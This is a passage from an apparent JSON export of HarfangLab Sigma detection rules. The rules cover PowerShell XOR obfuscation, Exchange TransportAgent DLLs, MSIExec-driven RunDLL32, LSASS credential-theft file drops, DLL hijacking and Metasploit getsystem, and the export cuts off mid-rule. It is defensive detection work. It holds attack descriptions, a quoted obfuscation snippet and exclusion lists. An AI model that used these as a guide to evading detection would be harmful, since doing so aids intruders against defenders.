"rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-24T07:14:08.491571Z", "creation_date": "2026-03-23T11:45:34.624842Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.624846Z", "rule_level": "medium", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://redcanary.com/blog/yellow-cockatoo/", "https://redcanary.com/threat-detection-report/techniques/powershell/", "https://attack.mitre.org/techniques/T1059/001/", "https://attack.mitre.org/techniques/T1027/" ], "name": "t1059_001_powershell_xor_obfuscation_script.yml", "content": "title: PowerShell XOR Obfuscation\nid: 029996a2-753c-4bd1-ac20-b8f180acbf90\ndescription: |\n Detects the use of the -bxor (byte XOR) encoding in a PowerShell script.\n This is often used by attackers to load their payloads in PowerShell scripts as to avoid having them in cleartext, which would trigger security solutions.\n It is recommended to use tools like CyberChef or to look in telemetry to obtain the cleartext version of the payload and analyze it.\n If the script is benign, it is highly recommended to whitelist it using parts of the script or its path if possible.\nreferences:\n - https://redcanary.com/blog/yellow-cockatoo/\n - https://redcanary.com/threat-detection-report/techniques/powershell/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1027/\ndate: 2021/06/24\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1027\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n # seen in PowerShell commandlines : ;$_-bXoR$S[($S[$I]+$S[$H])%256]}};\n selection:\n PowershellCommand|contains: '-bxor'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_remote_exchange:\n PowershellCommand|contains|all:\n - 'function ExportPSSessionAndImportModule'\n - 'hashValue -bxor ?CurrentUserRemotePSSettings.Hash'\n # function ExportPSSessionAndImportModule ($remotePSSettinsPath, $modulePath, [switch]$AllowClobber)\n # {\n # $hashValue = $global:remoteSession.ApplicationPrivateData.ImplicitRemoting.Hash\n # $CurrentUserRemotePSSettings = Get-ItemProperty -path $remotePSSettinsPath -ErrorAction SilentlyContinue\n # # PS3.0, Get-ItemProperty will return DWORD data as UInt32, instead of Int32 in PS2.0.\n # # If $hashValue is negative, (CurrentUserRemotePSSettings.Hash -ne $hashValue) will always be $true\n # # We use bitwise xor operation to work around\n # if (($CurrentUserRemotePSSettings -eq $null) `\n # -or ($CurrentUserRemotePSSettings.Hash -eq $null) `\n # -or (-not ($CurrentUserRemotePSSettings.ModulePath)) `\n # -or (($hashValue -bxor $CurrentUserRemotePSSettings.Hash) -ne 0))\n # {\n # # Redo Everything, when:\n # # 1. No registry entry found, or\n # # 2. Registry entry exists, but hash value or ModulePath is empty (which is very unlikely) or\n exclusion_sentinel_one:\n # C:\\Program Files\\SentinelOne\\Sentinel Agent 21.6.2.272\\SentinelPie.bin\n PowershellScriptPath: '?:\\Program Files\\SentinelOne\\Sentinel Agent *\\SentinelPie.bin'\n\n exclusion_defender:\n # C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\Firewall.psm1\n - PowershellCommand|contains:\n - 'xor between (2^32 - 1) and (2^(32-cidr) - 1) giving a binary with (32-cidr) leading bits ON'\n - '[ipaddress]([math]::pow(2, 32) -1 -bxor'\n - 'pow(2, 32) -1 -bxor [math]::pow(2, (32 - $cidr))-1)'\n - ProcessParentImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\SenseIR.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseCM.exe'\n\n exclusion_desktop_ini_hidden:\n # https://github.com/Vincoll/PS_NetworkShortcutTreeview\n # https://github.com/pauby/oxygen\n PowershellCommand|contains|all:\n - 'Desktop.ini'\n - '-Name Attributes -Value ([IO.FileAttributes]::System -bxor [IO.FileAttributes]::Hidden'\n\n # https://www.powershellgallery.com/packages/dbatools/1.1.103/Content/functions%5CInvoke-DbaDbDecryptObject.ps1\n exclusion_dbatool1:\n PowershellCommand|contains|all:\n - 'function Invoke-DecryptData() {'\n - '# Loop through each of the characters and apply an XOR to decrypt the data'\n - '# Compare the byte string character to the key character using XOR'\n - '# Create array list to hold the results'\n exclusion_dbatool2:\n PowershellCommand|contains|all:\n - 'function Get-DbaProductKey {'\n - '.SYNOPSIS'\n exclusion_dbatool3:\n PowershellCommand|contains|all:\n - 'function Find-DbaInstance {'\n - '.SYNOPSIS'\n\n exclusion_ixbs_apps:\n ProcessGrandparentImage:\n - '?:\\SRCI\\iXBs_Applications\\iXBus Serveur\\Plugins\\\\*\\service.exe'\n - '?:\\SRCI\\iXBs_Applications\\iXBus Server\\Plugins\\\\*\\service.exe'\n\n exclusion_modules:\n PowershellScriptPath|startswith:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\'\n - '?:\\program files\\powershell\\7\\Modules\\'\n - '?:\\Program Files (x86)\\Spiceworks Agent Shell\\modules\\Inventory Module\\'\n\n exclusion_cyberwatch:\n - ProcessImage|endswith: 'CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'CYBERWATCH SAS'\n - ProcessParentImage: '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n\n exclusion_ansible:\n - ProcessGrandparentCommandLine|contains:\n - 'powershell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand '\n - 'powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand '\n - 'powershell.exe -noninteractive -encodedcommand '\n ProcessAncestors|contains:\n - '?:\\Windows\\System32\\winrshost.exe|?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\OpenSSH\\sshd.exe|?:\\Windows\\System32\\services.exe'\n - ProcessCommandLine|contains: 'powershell.exe -noninteractive -encodedcommand '\n ProcessAncestors|contains: '?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe'\n - PowershellCommand|contains: '$module = [Ansible.Basic.AnsibleModule]::Create($args, $spec)'\n\n exclusion_schedule:\n - ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_log4net:\n - PowershellScriptPath|endswith: '\\Log4Net-Module\\Log4Net-Module.psm1'\n - PowershellCommand|contains|all:\n - '# Example of File Appender initialization'\n - '$Log = [log4net.LogManager]::GetLogger(\"root\");'\n - '# $Log.$Level($Message); # Ne fonctionnait pas sous 2012 non R2 PS3.0'\n - '[log4net.LogManager]::ResetConfiguration();'\n\n exclusion_ninjarmm:\n PowershellScriptPath: '?:\\ProgramData\\NinjaRMMAgent\\scripting\\\\*.ps1'\n\n # https://github.com/DanysysTeam/PS-SFTA/blob/master/SFTA.ps1\n exclusion_sfta:\n PowershellCommand|contains|all:\n - 'https://github.com/DanysysTeam/PS-SFTA'\n - 'function Get-FTA {'\n - 'Write-Output (( $iValue -shr $iCount) -bxor 0xFFFF0000)'\n\n exclusion_sysvol:\n PowershellScriptPath|contains: '\\sysvol\\\\*\\Policies\\{????????-????-????-????-????????????}\\User\\Scripts\\'\n\n exclusion_avacee:\n ProcessParentImage: '?:\\Program Files\\Avacee\\sip_agent\\SIPAgent.exe'\n\n exclusion_wybot:\n ProcessParentImage: '?:\\Program Files\\osquery\\\\*.exe'\n Signed: 'true'\n Signature: 'WYBOT SAS'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "029996a2-753c-4bd1-ac20-b8f180acbf90", "rule_name": "PowerShell XOR Obfuscation", "rule_description": "Detects the use of the -bxor (byte XOR) encoding in a PowerShell script.\nThis is often used by attackers to load their payloads in PowerShell scripts as to avoid having them in cleartext, which would trigger security solutions.\nIt is recommended to use tools like CyberChef or to look in telemetry to obtain the cleartext version of the payload and analyze it.\nIf the script is benign, it is highly recommended to whitelist it using parts of the script or its path if possible.\n", "rule_creation_date": "2021-06-24", "rule_modified_date": "2026-03-20", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.execution" ], "rule_technique_tags": [ "attack.t1027", "attack.t1059.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "029b4b5e-5b84-4646-ae2b-9c19d795c627", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.617032Z", "creation_date": "2026-03-23T11:45:34.617036Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.617043Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook", "https://attack.mitre.org/techniques/T1505/002/" ], "name": "t1505_002_edgetransport_loading_unsigned_dll.yml", "content": "title: Exchange EdgeTransport.exe Loaded Unsigned DLL\nid: 029b4b5e-5b84-4646-ae2b-9c19d795c627\ndescription: |\n Detects the loading of an unsigned DLL into EdgeTransport.exe.\n Attackers can install malicious TransportAgents in an compromised Exchange server. This malicious TransportAgent is in the form of a DLL loaded into EdgeTransport.exe.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\n It is recommended to analyze the loaded DLL, as well as to look for other signs of intrusion on the affected server.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/22\nmodified: 2025/11/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1071.003\n - attack.t1104\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EdgeTransport.exe'\n ImageLoaded|contains: '?'\n\n filter_empty:\n ImageSize: 0\n\n filter_microsoft_pdb:\n ManagedPdbBuildPath|startswith:\n - '?:\\dbs\\sh\\e16dt\\'\n - '?:\\dbs\\sh\\gffn\\'\n\n exclusion_signed:\n Signed: 'true'\n\n exclusion_assembly:\n ImageLoaded|startswith: '?:\\Windows\\assembly\\'\n\n exclusion_msvcm:\n ImageLoaded: '?:\\Windows\\winsxs\\amd64_microsoft.vc*.crt_*\\msvcm*.dll'\n\n exclusion_trendmicro:\n ImageLoaded|startswith: '?:\\Program Files\\Trend Micro\\Smex\\'\n\n exclusion_newton_json:\n ManagedPdbBuildPath: '?:\\Development\\Releases\\Json\\Working\\Newtonsoft.Json\\Src\\Newtonsoft.Json\\obj\\Release\\Newtonsoft.Json.pdb'\n\n exclusion_skimsigner:\n ImageLoaded|startswith: '?:\\Program Files\\Exchange DkimSigner'\n\n exclusion_exclaimer:\n ImageLoaded|startswith: '?:\\Program Files\\Exclaimer Ltd\\Email Alias Manager\\'\n\n exclusion_xml_serializer:\n sha256: 'd934a6ed579619a0c0629606a0b774855703a5eec5661749e823d4456ed77e33'\n ImageLoaded|startswith: '?:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\XmlSerializer.Exclaimer.LeanLicensing.License_'\n\n exclusion_passive_monitoring:\n sha256: '5eb73220279d1fa2525912a6e34061646990382b82dbd250297dbf6bbb8a9aaf'\n\n exclusion_mimekit:\n - ImageLoaded: '?:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\MimeKit.dll'\n - sha256: '69ae032bad923d3e9b7ad95b569222cdbe6ddcfb56cb302e7419869000b07dcd'\n\n exclusion_codetwo:\n ImageLoaded: '?:\\Program Files\\CodeTwo\\CodeTwo Exchange Rules\\\\*.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "029b4b5e-5b84-4646-ae2b-9c19d795c627", "rule_name": "Exchange EdgeTransport.exe Loaded Unsigned DLL", "rule_description": "Detects the loading of an unsigned DLL into EdgeTransport.exe.\nAttackers can install malicious TransportAgents in an compromised Exchange server. This malicious TransportAgent is in the form of a DLL loaded into EdgeTransport.exe.\nAttackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\nThe malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\nIt is recommended to analyze the loaded DLL, as well as to look for other signs of intrusion on the affected server.\n", "rule_creation_date": "2022-11-22", "rule_modified_date": "2025-11-05", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.collection", "attack.command_and_control", "attack.defense_evasion", "attack.persistence" ], "rule_technique_tags": [ "attack.t1071.003", "attack.t1104", "attack.t1114.002", "attack.t1505.002", "attack.t1546.008" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "029c4324-60c2-46df-b249-b6b72b737c5e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.616491Z", "creation_date": "2026-03-23T11:45:34.616495Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.616503Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://twitter.com/Cryptolaemus1/status/1733243361534857222", "https://attack.mitre.org/techniques/T1218/011/" ], "name": "t1218_011_suspicious_rundll32_msiexec.yml", "content": "title: Suspicious RunDLL32 Execution via MSIExec\nid: 029c4324-60c2-46df-b249-b6b72b737c5e\ndescription: |\n Detects the suspicious loading of a DLL by RunDLL32 via MSIExec.\n Attackers can use MSI files as an installation vector for malware, executing malicious payloads during the installation process.\n Specifically, they can configure a Custom Action in the MSI to load a DLL via RunDLL32.\n This behavior is used by the Pikabot malware, in its initial infection chain.\n It is recommended to analyze the loaded DLL and to look for malicious content or actions performed by RunDLL32.\nreferences:\n - https://twitter.com/Cryptolaemus1/status/1733243361534857222\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2023/12/11\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'RUNDLL32.EXE'\n CommandLine|contains: '?:\\Users\\\\*\\AppData\\Local\\Temp'\n ParentImage|endswith: '\\rundll32.exe'\n GrandparentImage|endswith: '\\msiexec.exe'\n\n exclusion_setupapi:\n CommandLine|contains: 'setupapi,InstallHinfSection'\n\n exclusion_adinstrument:\n CommandLine|contains: '\\ADInstruments\\LabChart8\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "029c4324-60c2-46df-b249-b6b72b737c5e", "rule_name": "Suspicious RunDLL32 Execution via MSIExec", "rule_description": "Detects the suspicious loading of a DLL by RunDLL32 via MSIExec.\nAttackers can use MSI files as an installation vector for malware, executing malicious payloads during the installation process.\nSpecifically, they can configure a Custom Action in the MSI to load a DLL via RunDLL32.\nThis behavior is used by the Pikabot malware, in its initial infection chain.\nIt is recommended to analyze the loaded DLL and to look for malicious content or actions performed by RunDLL32.\n", "rule_creation_date": "2023-12-11", "rule_modified_date": "2025-02-07", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1218.011" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "02b0f6f4-476e-4b12-8067-6fbac9b0fc30", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:35.297348Z", "creation_date": "2026-03-23T11:45:35.297352Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:35.297359Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/", "https://github.com/gentilkiwi/mimikatz" ], "name": "t1003_001_lsass_dropping_file_unknown_module.yml", "content": "title: File Dropped by LSASS Process from Unknown Module\nid: 02b0f6f4-476e-4b12-8067-6fbac9b0fc30\ndescription: |\n Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process from an unknown module.\n The LSASS process is responsible for authentications in Windows.\n Adversaries may attempt to access credential material stored in the LSASS' process memory.\n A file dropped by the LSASS process could be the result of credential theft.\n It is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\n If this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\nreferences:\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://github.com/gentilkiwi/mimikatz\ndate: 2025/03/24\nmodified: 2026/03/05\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\lsass.exe'\n MinimalStackTrace|endswith: '|UNKNOWN'\n\n exclusion_netlogon:\n Path: '?:\\Windows\\System32\\config\\netlogon.ftl'\n\n exclusion_path:\n Path:\n - '?:\\ProgramData\\Microsoft\\Crypto\\Keys\\\\????????????????????????????????_????????-????-????-????-????????????'\n - '?:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\\\????????????????????????????????_????????-????-????-????-????????????'\n - '?:\\System Volume Information\\EFS0.LOG'\n - '?:\\Windows\\NTDS\\edbtmp.log'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Users\\\\*\\AppData\\Local\\Packages\\\\*'\n - '?:\\Users\\\\*\\AppData\\LocalLow\\Microsoft\\\\*'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\\\*'\n - '?:\\Windows\\ServiceProfiles\\\\*\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Windows\\ServiceProfiles\\\\*\\AppData\\Roaming\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\Microsoft\\Protect\\S-*\\\\????????-????-????-????-????????????'\n - '?:\\Windows\\System32\\Microsoft\\Protect\\S-*\\User\\\\????????-????-????-????-????????????'\n\n exclusion_credential_manager:\n Path:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Vault\\\\????????-????-????-????-????????????\\\\????????????????????????????????????????.vcrd'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Vault\\\\????????-????-????-????-????????????\\\\????????-????-????-????-????????????.vsch'\n\n exclusion_securetimeaggregator:\n Path: '?:\\Windows\\System32\\\\????????-????-????-????-????????????'\n StackTrace|contains: '|?:\\Windows\\System32\\SecureTimeAggregator.dll!'\n\n exclusion_btpass:\n MinimalStackTrace|contains: '|BTPassAsm.dll|'\n Path: '?:\\Windows\\BTPass\\BT*.txt'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "02b0f6f4-476e-4b12-8067-6fbac9b0fc30", "rule_name": "File Dropped by LSASS Process from Unknown Module", "rule_description": "Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process from an unknown module.\nThe LSASS process is responsible for authentications in Windows.\nAdversaries may attempt to access credential material stored in the LSASS' process memory.\nA file dropped by the LSASS process could be the result of credential theft.\nIt is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\nIf this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\n", "rule_creation_date": "2025-03-24", "rule_modified_date": "2026-03-05", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1003.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "02c15562-11e7-4250-b6e6-12f040b41450", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.591575Z", "creation_date": "2026-03-23T11:45:34.591579Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.591587Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://wietze.github.io/blog/save-the-environment-variables", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_iesettingsync.yml", "content": "title: DLL Hijacking via IESettingSync.exe\nid: 02c15562-11e7-4250-b6e6-12f040b41450\ndescription: |\n Detects potential Windows DLL Hijacking via IESettingSync.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'IESettingSync.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\iertutil.dll'\n - '\\mpr.dll'\n - '\\sspicli.dll'\n - '\\umpdc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "02c15562-11e7-4250-b6e6-12f040b41450", "rule_name": "DLL Hijacking via IESettingSync.exe", "rule_description": "Detects potential Windows DLL Hijacking via IESettingSync.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "02ce0f33-c820-4f8d-8af4-6118aa5e0f86", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.077208Z", "creation_date": "2026-03-23T11:45:34.077210Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.077214Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://docs.rapid7.com/metasploit/meterpreter-getsystem/", "https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70", "https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/namedpipe.c", "https://attack.mitre.org/techniques/T1134/001/" ], "name": "t1134_001_metasploit_get_system.yml", "content": "title: Metasploit Get SYSTEM Command Detected\nid: 02ce0f33-c820-4f8d-8af4-6118aa5e0f86\ndescription: |\n Detects a suspicious attempt to elevate privilege to local SYSTEM via the Metasploit Framework.\n Metasploit is a penetration testing framework used for exploiting vulnerabilities, gaining unauthorized access, performing privilege escalation, and conducting post-exploitation activities.\n Metasploit spawns a service to elevate from local Admin to local SYSTEM via Named Pipe Impersonation.\n It is recommended to investigate other malicious actions taken by the detected process and its ancestors.\nreferences:\n - https://docs.rapid7.com/metasploit/meterpreter-getsystem/\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/namedpipe.c\n - https://attack.mitre.org/techniques/T1134/001/\ndate: 2022/02/14\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1134.001\n - attack.t1569.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Metasploit\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_services:\n 